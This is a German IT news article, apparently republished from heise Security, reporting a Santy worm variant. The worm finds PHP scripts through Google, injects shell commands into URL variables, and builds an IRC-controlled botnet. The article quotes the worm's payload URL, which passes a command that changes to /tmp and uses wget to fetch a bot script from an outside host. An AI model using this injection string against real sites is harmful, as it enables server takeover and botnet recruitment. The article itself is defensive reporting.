Wurm attackiert PHP-Skripte

Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700

Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700 Zombies angemeldet sind, die der Wurm kontrolliert. Über spezielle Kommandos können diese Zombies unter anderem Port-Scans und verteilte DoS-Angriffe durchführen.

Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:


http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;
wget www.visualcoders.net/spybot.txt;


Überprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server.


hiese.de
Author

Ratings

There are no comments available yet.

Here you can write a comment


Please enter at least 10 characters.
Loading... Please wait.
* Pflichtangabe

Related topics

Subselects und bald auch Stored Procedures für MySQL

Demnächst wird die MySQL-Version 4.1 zum Download angeboten. Auf der LinuxWorld Expo wurde von MySQL AB offiziell eine neue Version ihres Datenbank-Management-Systems angekündigt. Neben vielen anderen Erweiterungen gehören die Unterabfragen (Subselects ...

admin

Autor : admin
Category: Software & Web-Development

vServer-Angebot von Mittwald.de

Agentur-Toolbox für 3 Monate kostenlos testen ...

admin

Autor : admin
Category: Miscellaneous

PremiumSoft veröffentlicht MySQL Studio version 4.4

PremiumSoft veröffentlicht MySQL Studio version 4.4 Grafische Oberfläche für Ihre MYSQL Datenbank Mit dem PremiumSoft MySQL Studio ist eine grafische Oberfläche für Ihre MYSQL Datenbank. Dieses Tool ermöglicht es Reports auf einfache Art und Weise z ...

admin

Autor : admin
Category: Software & Web-Development

Navicat (MySQL GUI) new version supports Data Synchronization!

Navicat is a powerful yet easy to use MySQL GUI providing extensive functionality for managing and developing MySQL database. Navicat's user-friendly, intuitive interface lets you manage multiple databases and connect to remote MySQL server as easy and ef ...

admin

Autor : admin
Category: Software & Web-Development

ebiz-Webhostingpaket XL jetzt mit Groupware-Funktion

ebiz-webhosting hat seine Webpakte neu konfiguriert. Insbesondere das Business-Paket XL wurde großzügig aufgestockt und zusätzlich mit einem Microsoft Exchange Postfach ausgestattet. ...

admin

Autor : admin
Category: Miscellaneous

Wurm jagt Wurm

TrendMicro zufolge ist seit dem 18.8. im Internet eine neue Version des Wurms W32.Blaster/LovSAN unterwegs. Sie nutzt die gleichen Einfallstore und Mechanismen wie LovSAN -- enthält aber eine neue Funktion: Wird auf dem befallenen Rechner der Original-Bla ...

admin

Autor : admin
Category: Software & Web-Development

Wir entwickeln seit über 20 Jahren Web & E-Commerce Anwendungen
Egelsbach, Deutschland

Publish a press release

Share your news and information

Share your news and information with others

You want to inform other users about an interesting IT topic, then sign up now and share it with our PHP community

learn more

Publish a press release